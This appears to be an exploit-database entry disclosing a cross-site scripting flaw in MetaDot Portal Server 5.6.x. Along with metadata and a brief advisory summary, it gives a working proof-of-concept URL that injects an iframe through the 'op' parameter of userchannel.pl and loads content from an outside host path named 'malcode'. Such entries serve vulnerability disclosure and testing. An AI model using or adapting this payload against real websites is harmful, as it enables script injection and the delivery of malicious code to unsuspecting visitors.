MetaDot Portal Server 5.6.x - 'userchannel.pl?op' Cross-Site Scripting

Author: JeiAr
type: webapps
platform: cgi
port: 
date_added: 2004-01-16 
date_updated: 2012-12-20 
verified: 1 
codes: OSVDB-3582 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/9439/info

A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting.

/userchannel.pl?id=435&isa=NewsChannel&redirect=1&op="><iframe%20src=http://www.example.com/malcode>